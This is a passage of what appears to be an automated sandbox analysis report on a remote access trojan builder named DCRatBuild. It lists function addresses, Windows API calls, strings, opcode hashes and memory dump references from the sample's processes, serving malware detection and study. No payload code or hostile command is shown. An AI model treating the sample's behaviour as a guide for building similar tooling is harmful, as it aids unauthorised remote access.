                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Thread$CreatePriority__vswprintf_c_l
                      • String ID: CreateThread failed
                      • API String ID: 2655393344-3849766595
                      • Opcode ID: f3aa4e61c31fab1e9968396e907e7b18e4697bcc952bc4185f86a9ce56248363
                      • Instruction ID: 797edd4136f85ebf5427e698701765ea3debdf436cad5e3dacaffa5224f17653
                      • Opcode Fuzzy Hash: f3aa4e61c31fab1e9968396e907e7b18e4697bcc952bc4185f86a9ce56248363
                      • Instruction Fuzzy Hash: B00149B1344301AFD724BF54EC81F667B98EF01711F10403EFA8AA22C1DEA1B8409674
                      Function 00D6130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D6DA98: _swprintf.LIBCMT ref: 00D6DABE
                        • Part of subcall function 00D6DA98: _strlen.LIBCMT ref: 00D6DADF
                        • Part of subcall function 00D6DA98: SetDlgItemTextW.USER32(?,00D9E154,?), ref: 00D6DB3F
                        • Part of subcall function 00D6DA98: GetWindowRect.USER32(?,?), ref: 00D6DB79
                        • Part of subcall function 00D6DA98: GetClientRect.USER32(?,?), ref: 00D6DB85
                      • GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                      • SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ItemRectTextWindow$Client_strlen_swprintf
                      • String ID: 0
                      • API String ID: 2622349952-4108050209
                      • Opcode ID: 17c71f3e430916931e64124b4dfa28e0adf55aa30f18e611559727257fc91fa8
                      • Instruction ID: 0611cceda27d24b29f67a87890d34dafdc66bd2c0b4693778003809ab7334525
                      • Opcode Fuzzy Hash: 17c71f3e430916931e64124b4dfa28e0adf55aa30f18e611559727257fc91fa8
                      • Instruction Fuzzy Hash: 9AF08C3810438DABDF250F608809BBA3B98BB25305F0C8114FD4A947B1C774C995AA74
                      Function 00D7084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                      Download Yara Rule
                      APIs
                      • WaitForSingleObject.KERNEL32(?,000000FF,00D70A78,?), ref: 00D70854
                      • GetLastError.KERNEL32(?), ref: 00D70860
                        • Part of subcall function 00D66E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D66EAF
                      Strings
                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00D70869
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                      • API String ID: 1091760877-2248577382
                      • Opcode ID: 4beeed0ac83104984b1f547c0ad96c2c221840a7c2f278483994200cf0021ecc
                      • Instruction ID: 73506b787e667e361c96a690f03c0c376e7bb1a49830050c43a23ffaf0192cbb
                      • Opcode Fuzzy Hash: 4beeed0ac83104984b1f547c0ad96c2c221840a7c2f278483994200cf0021ecc
                      • Instruction Fuzzy Hash: 5BD05E31A081306BCB103B64AC0ADAF7D099F52770F248719F23DA52F6DA22495182F6
                      Function 00D6DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,00D6D32F,?), ref: 00D6DA53
                      • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00D6D32F,?), ref: 00D6DA61
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: FindHandleModuleResource
                      • String ID: RTL
                      • API String ID: 3537982541-834975271
                      • Opcode ID: b177d7e905c164584dd2b4ff94f64213ad80fa47d7965f59b955503d78ccbe90
                      • Instruction ID: 47a4fc0496451268ecca4faf62d66d27b5df5903e102900f0a7b23d71b754faf
                      • Opcode Fuzzy Hash: b177d7e905c164584dd2b4ff94f64213ad80fa47d7965f59b955503d78ccbe90
                      • Instruction Fuzzy Hash: 23C0123178935077DB301B607C0DB4329485B10B11F09044DB145DA2D0D5F6C9448670

                      Executed Functions

                      Function 00007FFD34471618 Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID: 2EP4
                      • API String ID: 0-2520254972
                      • Opcode ID: fa7fac3ea0f31764472c145a98fe529c1e848e30f4e88aaaf6f3f421987daa20
                      • Instruction ID: 8b320eae811f84561b315c951571bc6ab51f9d49b537d636e2f95fd79667c52d
                      • Opcode Fuzzy Hash: fa7fac3ea0f31764472c145a98fe529c1e848e30f4e88aaaf6f3f421987daa20
                      • Instruction Fuzzy Hash: B081A031B0CA494FEB58DE1C8CA55A97BE2FF99304B15417AE59DD3386CE78EC028781
                      Function 00007FFD34470A01 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID: v64
                      • API String ID: 0-2040660224
                      • Opcode ID: 0e61cfa4cb5d6fcf27ff6ecc992737f4fa251a6354910f4d0faa429aca5d3ad2
                      • Instruction ID: 8730eb3cdd30433bf01394f92ff4127949d1934af30a76aa3e47fdebb442a87c
                      • Opcode Fuzzy Hash: 0e61cfa4cb5d6fcf27ff6ecc992737f4fa251a6354910f4d0faa429aca5d3ad2
                      • Instruction Fuzzy Hash: D011BF31E0950E4FEB90EF6888A91BD7BE4FF6A300F4285B6D528D6096DE7CE8459740
                      Function 00007FFD3447111D Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID: Xy64
                      • API String ID: 0-3698708046
                      • Opcode ID: b543dfa5852d478b0de6be5c2ea804c5d860a7be3157cd37d8bac8b31f5cb62e
                      • Instruction ID: 82e73c75391f81b5ce97bd0ef8a5ff4c22303a44d82bc2f0f7bfcdd11e0707ff
                      • Opcode Fuzzy Hash: b543dfa5852d478b0de6be5c2ea804c5d860a7be3157cd37d8bac8b31f5cb62e
                      • Instruction Fuzzy Hash: 0711D331E1854A8FEB99DB648CB82B97FE4FF1A301F4141BED12ADA2C6DA796441D700
                      Function 00007FFD34471130 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID: Xy64
                      • API String ID: 0-3698708046
                      • Opcode ID: d980d76882dc7b51ef5e1a0bea59153bcf1667c2eadce54947da928a7fcce11d
                      • Instruction ID: d4f89d2c8ccc0991347c30d9ad584dc1bf28df2e974318644cf6ab7c4a6e64e4
                      • Opcode Fuzzy Hash: d980d76882dc7b51ef5e1a0bea59153bcf1667c2eadce54947da928a7fcce11d
                      • Instruction Fuzzy Hash: 9AF0F430E1854F8AFB989B688CB82F97BE4FF0A305F00413EE42AD62C6DB786015D240
                      Function 00007FFD34471C4D Relevance: .2, Instructions: 191COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 14315601eb542b3b23131b34f1c418eaa5ff25daf45aed4ead1b9648f0863666
                      • Instruction ID: 5f9d4142b79130febe6eb2217a1f7daf37c37486110556b702abcbd3582152ac
                      • Opcode Fuzzy Hash: 14315601eb542b3b23131b34f1c418eaa5ff25daf45aed4ead1b9648f0863666
                      • Instruction Fuzzy Hash: 0551D531B08A894FDB58DE1888A55BA7BE2FFD9304B15417ED55AD3385CE78E8028781
                      Function 00007FFD34473145 Relevance: .1, Instructions: 149COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 601137036a071a67f65b47dac3e715089b18ce11dde210315c59ee386503b097
                      • Instruction ID: db981b179d69e472d5b8620311f3c6bb43001abdf30da0af4c2767345e0abfb8
                      • Opcode Fuzzy Hash: 601137036a071a67f65b47dac3e715089b18ce11dde210315c59ee386503b097
                      • Instruction Fuzzy Hash: 4C514B70E0850D8FEB54DBA8C8A96EDBBF1FF49300F11807AD119E7295EE786845DB10
                      Function 00007FFD34472065 Relevance: .1, Instructions: 144COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9058fe163ee555eccf3085dce87bafd428f7d1287fe4a36cc00fc5418e77a2df
                      • Instruction ID: 185f417be8df732ddf3ea57ec306dc438c37337754b3a658f9150dfb8e0a5cc1
                      • Opcode Fuzzy Hash: 9058fe163ee555eccf3085dce87bafd428f7d1287fe4a36cc00fc5418e77a2df
                      • Instruction Fuzzy Hash: 79417832B0C68A0FE755DB7898A61B97BE4FF87350F0680BBD11CC7196DE6CA8428351
                      Function 00007FFD34472231 Relevance: .1, Instructions: 126COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c1c86d679bc7fce6bafc07fc7f3beb5e31ee824d664ee350d21bafd704e0eaca
                      • Instruction ID: bf43636c4a258e68bc3790700705441accd4cef4e198aa7376d8ce138afb4eb4
                      • Opcode Fuzzy Hash: c1c86d679bc7fce6bafc07fc7f3beb5e31ee824d664ee350d21bafd704e0eaca
                      • Instruction Fuzzy Hash: AC512630E041298EEB649B50CC917F8BAB0FF06301F1185BAD15DD6286DF7C5A86DF51
                      Function 00007FFD344736BA Relevance: .1, Instructions: 96COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5fdb6b9668a42b6437ce3482ee08121bf3634012b5b9c520c4f79f37e43f5f51
                      • Instruction ID: 6e38988f5b36e32ca639cc80c53aac04a5fd22c260259df5b58b539f771da95f
                      • Opcode Fuzzy Hash: 5fdb6b9668a42b6437ce3482ee08121bf3634012b5b9c520c4f79f37e43f5f51
                      • Instruction Fuzzy Hash: 6831FF71A0C90A8FE794DF98E8683A87BE1EB96364F50407EC00DD36D6CFF924058B40
                      Function 00007FFD3447328C Relevance: .1, Instructions: 84COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4124f2ac98f3dbdbad63ccf9294ce722699239995d04b047d2e4edaa9ce25b0b
                      • Instruction ID: f75337c6ccec2b217fe4d8f6a3cf0f4ebdf7ffed3435c880edbe13468a7e7b0a
                      • Opcode Fuzzy Hash: 4124f2ac98f3dbdbad63ccf9294ce722699239995d04b047d2e4edaa9ce25b0b
                      • Instruction Fuzzy Hash: D6310670E0851D8FEB54EB98C8A4AECBBF1FF59300F15803AD119E7296DA786841DB10
                      Function 00007FFD34473348 Relevance: .1, Instructions: 77COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cb347818d3ffecebfba703c87618e689a06165897f821238613a9957f291fd03
                      • Instruction ID: 051806f43d76370cc4e246d86366e908bdef59f4415ca8163dd7d1cce6bfd38d
                      • Opcode Fuzzy Hash: cb347818d3ffecebfba703c87618e689a06165897f821238613a9957f291fd03
                      • Instruction Fuzzy Hash: 26219A3094D68A9FE752EB748CA85EA3FF4EF07310B0545F6D058CB0A2EA7C954AC751
                      Function 00007FFD34471F19 Relevance: .1, Instructions: 65COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7b30112effb5af9980a1711b1a2e4d294fcadaa21ca25c6e5602563d590e77e4
                      • Instruction ID: c83980fcd5501a395ef1fbd652712c90555b0d3eb8128a6750af8c4d9474a96b
                      • Opcode Fuzzy Hash: 7b30112effb5af9980a1711b1a2e4d294fcadaa21ca25c6e5602563d590e77e4
                      • Instruction Fuzzy Hash: BF117C01A4E2C25FEB6397780CB54666FD44F03224B2E85FBE1E8CB1E7DA5C484AD312
                      Function 00007FFD34473475 Relevance: .1, Instructions: 54COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5bc499bf18505941a54eeff76b36375223af1fbc7fa35675193890d8942170d1
                      • Instruction ID: 17e1166af45d916368cd0c89205948b731689b49accfd61690828b737eb7dc63
                      • Opcode Fuzzy Hash: 5bc499bf18505941a54eeff76b36375223af1fbc7fa35675193890d8942170d1
                      • Instruction Fuzzy Hash: 1A11A030E4868D8FDB99EFA488AA1B97FE0FF16300F0105BED629D2191EB79A441C700
                      Function 00007FFD344705D8 Relevance: .0, Instructions: 50COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6c7ba74975b0e03dcce9e9addd2fbc6debdc2d850b68072499e37e8125d4c6b8
                      • Instruction ID: 819b0dd781eb9ce98e4bf12c7be81f5dd90cf3151a2999f61155212d6239db1c
                      • Opcode Fuzzy Hash: 6c7ba74975b0e03dcce9e9addd2fbc6debdc2d850b68072499e37e8125d4c6b8
                      • Instruction Fuzzy Hash: 2401B530E0850E8FEB48EF64C8A56B97BA1FF59305F11447ED41ED3294CE76A551C740
                      Function 00007FFD34472E59 Relevance: .0, Instructions: 45COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4ad5e684cce048be3bc4ce5992074dbcd0de61c07ff97713fa5759632733cc3e
                      • Instruction ID: 002d138a2a7b4ebdd3e4dfd0b5521345c12013339834ba52c562def67ccfd8d1
                      • Opcode Fuzzy Hash: 4ad5e684cce048be3bc4ce5992074dbcd0de61c07ff97713fa5759632733cc3e
                      • Instruction Fuzzy Hash: 7D018F30A4D6499FE752AB7488A96A93FE0FF0A300F0689B2D618C60A7DE7CA4459701
                      Function 00007FFD344727BD Relevance: .0, Instructions: 44COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 17ef7f50185517f994475833a73ae70cc68b6638e14ca53133b593868d6fe03c
                      • Instruction ID: e9aa9004e9b9c991b4560e47da184833d1762e1784d14a4b34e94575e8b2c0a5
                      • Opcode Fuzzy Hash: 17ef7f50185517f994475833a73ae70cc68b6638e14ca53133b593868d6fe03c
                      • Instruction Fuzzy Hash: B101DF30E0DA4D8FE751EB2488A91A97FE0FF1A300F0285B6D518C70A6EA79E0819700
                      Function 00007FFD34470610 Relevance: .0, Instructions: 42COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a8a8b6451e37ff28167c45bc3a68da1b49faeb6262038df10edcdc0a6ded8ad1
                      • Instruction ID: 209f948e4da39da365b9c24f051aac28ac4ba7b3ea1413662806e8769ea36fb8
                      • Opcode Fuzzy Hash: a8a8b6451e37ff28167c45bc3a68da1b49faeb6262038df10edcdc0a6ded8ad1
                      • Instruction Fuzzy Hash: 5E01D630A0450E8BEB58EF64C5A82B977A4FF19305F51447ED41EC21D4DE7AA141C600
                      Function 00007FFD34470608 Relevance: .0, Instructions: 42COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 085fb7dd226ec1f89d7eeebe414d998223e6b1108b1e6fc70e9a490a0a0d5103
                      • Instruction ID: 2d260507acb8ef5745536956904fd476eaab90830cbef7f68588744d9955d2d9
                      • Opcode Fuzzy Hash: 085fb7dd226ec1f89d7eeebe414d998223e6b1108b1e6fc70e9a490a0a0d5103
                      • Instruction Fuzzy Hash: D201DC30A0850E8BEB5CEF64C8A82BA3BA4FF19304F11487EE42ED21C5DE7AA041C600
                      Function 00007FFD34471BCD Relevance: .0, Instructions: 41COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dafc74945ba44f02d0ea5556be099a251d39ebfadb5dad10556c4d46c49785b2
                      • Instruction ID: d154bf499d2c5eb46399d58aaeef74b0e90d9eec5c3629804f5ba51b35c3a388
                      • Opcode Fuzzy Hash: dafc74945ba44f02d0ea5556be099a251d39ebfadb5dad10556c4d46c49785b2
                      • Instruction Fuzzy Hash: 4801D630A0D68D8FEB58DF248CA52BA3FA0FF16301F4544BED918C3196DB799451D741
                      Function 00007FFD344705D0 Relevance: .0, Instructions: 39COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d981732d7347f15062af2b15b8ecc2bda8a386581f7a4fe7766d13d1531800f1
                      • Instruction ID: 0323963440605edecad4a4c0cb702bdabd6f653086e67daad87fb28c41095e85
                      • Opcode Fuzzy Hash: d981732d7347f15062af2b15b8ecc2bda8a386581f7a4fe7766d13d1531800f1
                      • Instruction Fuzzy Hash: 36F0F630A0950E8FEB54EF64C8A62FA3BA4FF06304F11447AE81DC3285DA79A451D780
                      Function 00007FFD344726D9 Relevance: .0, Instructions: 33COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3fc4ad0d8577712ae0812cdf0e824c1db4151434167e9c92a2e17436823c3c60
                      • Instruction ID: 0ebd4ee503ffe537690cbf79d1860a144bd4c82857fec5d50b939776593fa5f9
                      • Opcode Fuzzy Hash: 3fc4ad0d8577712ae0812cdf0e824c1db4151434167e9c92a2e17436823c3c60
                      • Instruction Fuzzy Hash: 0AF0F03090E3C98FEB5A9F248CB92A93FA0BF06300F4644BBD519C60D2DB7D9408C301
                      Function 00007FFD3447274D Relevance: .0, Instructions: 33COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 782b58f499c28e27b0b189ff7bce18c05bf6e9f35e9decfc1333e72e5eca873e
                      • Instruction ID: 7cfb0cdaee51e5bdf7e38e3304259cfcabbec629aaef9f40fff2cfe6d1a6445d
                      • Opcode Fuzzy Hash: 782b58f499c28e27b0b189ff7bce18c05bf6e9f35e9decfc1333e72e5eca873e
                      • Instruction Fuzzy Hash: F5F0F03190D28A8FEB699F2489652AA3FA4BF07300F4244BEE919C20D2DB7D9400C601
                      Function 00007FFD34470F49 Relevance: .0, Instructions: 28COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6a5091f2c3d627d64e330e59f416e397a322f2fc89bf5bc14fe0bdc417aebd79
                      • Instruction ID: beb346cc5b2ddc65eb0e358d13c85c32d194c9d4350be887df445228838c85e5
                      • Opcode Fuzzy Hash: 6a5091f2c3d627d64e330e59f416e397a322f2fc89bf5bc14fe0bdc417aebd79
                      • Instruction Fuzzy Hash: F7F03030E1A50ACBFB20DB54CCA5BBD7BB1FB55305F208275D109E3295DEB8A9858F80
                      Function 00007FFD34471680 Relevance: .0, Instructions: 25COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b2a1a5cca1e6e06b9dbeb7d39b273728c7f151a8c036831ce9938b39de7d2662
                      • Instruction ID: 24480e7ec079aa2ed548868011c67b361757f474b421869b49e85dd6ea636fb9
                      • Opcode Fuzzy Hash: b2a1a5cca1e6e06b9dbeb7d39b273728c7f151a8c036831ce9938b39de7d2662
                      • Instruction Fuzzy Hash: 80E06D20F098024AEB24521888D563469D19F46304FBAC275F23CC73E9EAACEC83E200

                      Executed Functions

                      Function 00007FFD344959BD Relevance: 9.1, Strings: 7, Instructions: 340COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: YR4$0YR4$@YR4$@ZR4$PZR4$`ZR4$pZR4
                      • API String ID: 0-2815790201
                      • Opcode ID: 4f4a1fc254a46c50fdb82f8541195ef5e7f55d78da9f8c00265a6fdffac978a1
